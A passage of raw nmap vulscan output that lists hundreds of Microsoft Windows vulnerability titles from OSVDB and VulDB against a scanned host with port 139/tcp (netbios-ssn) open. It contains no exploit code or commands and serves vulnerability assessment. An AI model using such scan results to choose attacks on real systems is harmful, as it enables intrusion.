DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17893] Microsoft ASP.NET RPC/encoded Mode Malformed SOAP Message DoS [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14509] Microsoft Services for Unix Malformed RPC Client Fragment Packet DoS [14497] Microsoft Services for Unix RPC Library Malformed Packet Fragment DoS [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account
139	tcp	open	netbios-ssn	syn-ack	Microsoft Windows netbios-ssn
	vulscan	VulDB - https://vuldb.com: [176522] Microsoft Windows 7 SP1 up to Server 2019 MSHTML Platform unknown vulnerability [176520] Microsoft Windows 10 20H2 up to Server 2004 DWM Core Library unknown vulnerability [176515] Microsoft Windows 10 up to Server 2019 Hyper-V denial of service [176514] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176513] Microsoft Windows 8.1 up to Server 2019 Server for NFS information disclosure [176512] Microsoft Windows 8.1 up to Server 2019 NFS denial of service [176511] Microsoft Windows 7 SP1 up to Server 2019 GPSVC unknown vulnerability [176510] Microsoft Windows 7 SP1 up to Server 2019 Event Tracing information disclosure [176509] Microsoft Windows 7 SP1 up to Server 2019 HTML Platform unknown vulnerability [176508] Microsoft Windows 8.1 up to Server 2019 TCP/IP Driver denial of service [176507] Microsoft Windows 10 20H2 up to Server 2019 Cloud Files Mini Filter Driver unknown vulnerability [176506] Microsoft Windows 7 SP1 up to Server 2019 Remote Desktop Services denial of service [176500] Microsoft Windows 7 SP1 up to Server 2019 Kerberos AppContainer unknown vulnerability [176499] Microsoft Windows 10 20H2/10 21H1/10 2004/Server 20H2/Server 2004 Bind Filter Driver information disclosure [176498] Microsoft Windows 7 SP1 up to Server 2019 Scripting Engine unknown vulnerability [176497] Microsoft Windows 7 SP1 up to Server 2019 NTLM unknown vulnerability [176495] Microsoft Windows 7 SP1 up to Server 2019 NTFS unknown vulnerability [176494] Microsoft Windows 10 20H2 up to Server 2004 Kernel information disclosure [176493] Microsoft Windows 7 SP1 up to Server 2019 Common Log File System Driver unknown vulnerability [176492] Microsoft Windows 7 SP1 up to Server 2019 Filter Manager unknown vulnerability [176491] Microsoft Windows 10 20H2 up to Server 2019 Kernel-Mode Driver unknown vulnerability [176490] Microsoft Windows 10 20H2 up to Server 2019 Kernel unknown vulnerability [176477] Microsoft Windows 7 SP1 up to Server 2019 Enhanced Cryptographic Provider unknown vulnerability [176474] Microsoft Windows 7 SP1 up to Server 2019 DCOM Server unknown vulnerability [174874] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174873] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking information disclosure [174871] Microsoft Windows 7 SP1 up to Server 2019 Wireless Networking unknown vulnerability [174870] Microsoft Windows 7 SP1 up to Server 2019 unknown vulnerability [174868] Microsoft Windows 8.1 up to Server 2019 CSC Service information disclosure [174866] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174865] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 HTTP Protocol Stack unknown vulnerability [174864] Microsoft Windows 10 20H2 up to Server 2019 Container Manager Service unknown vulnerability [174863] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174862] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Container Manager Service unknown vulnerability [174861] Microsoft Windows 10 20H2 up to Server 2019 Graphics unknown vulnerability [174849] Microsoft Windows 7 SP1 up to Server 2019 Bluetooth Driver unknown vulnerability [174848] Microsoft Windows 7 SP1 up to Server 2019 Infrared Data Association information disclosure [174847] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Desktop Bridge denial of service [174846] Microsoft Windows 7 SP1 up to Server 2019 RDP information disclosure [174845] Microsoft Windows 10 20H2 up to 10 2004 WalletService unknown vulnerability [174844] Microsoft Windows 7 SP1 up to Server 2019 Graphics unknown vulnerability [174843] Microsoft Windows 10 1809/Server 2019 Container Isolation FS Filter Driver unknown vulnerability [174842] Microsoft Windows 10 20H2 up to Server 2019 Projected File System FS Filter Driver information disclosure [174841] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 Media Foundation Core unknown vulnerability [174840] Microsoft Windows 7 SP1 up to Server 2019 on SSDP Service unknown vulnerability [174839] Microsoft Windows 7 SP1 up to Server 2019 OLE Automation unknown vulnerability [174835] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB Client Security Feature unknown vulnerability [174824] Microsoft Windows 7 SP1 up to Server 2019 Hyper-V VmsIfrInfoParams_OID_SWITCH_NIC_REQUEST unknown vulnerability [172949] Microsoft Windows 10 up to Server 2019 Media Photo Codec information disclosure [172947] Microsoft Windows 7 SP1 up to Server 2019 Internet Messaging API unknown vulnerability [172941] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172937] Microsoft Windows 10 20H2 up to Server 2019 Hyper-V denial of service [172933] Microsoft Windows 10 20H2 up to Server 2019 Application Compatibility Cache denial of service [172929] Microsoft Windows 7 SP1 up to Server 2019 Media Video Decoder unknown vulnerability [172925] Microsoft Windows 10 20H2 up to Server 2019 TCP/IP Driver denial of service [172921] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172920] Microsoft Windows 10 20H2/10 2004/Server 20H2/Server 2004 SMB information disclosure [172919] Microsoft Windows 8.1 up to Server 2019 SMB information disclosure [172917] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172916] Microsoft Windows 7 SP1 up to Server 2019 DNS information disclosure [172915] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172914] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172913] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172912] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172911] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172910] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172909] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172908] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172907] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172906] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172905] Microsoft Windows 7 SP1 up to Server 2019 on Remote Procedure Call Runtime unknown vulnerability [172904] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown vulnerability [172903] Microsoft Windows 7 SP1 up to Server 2019 Remote Procedure Call Runtime unknown 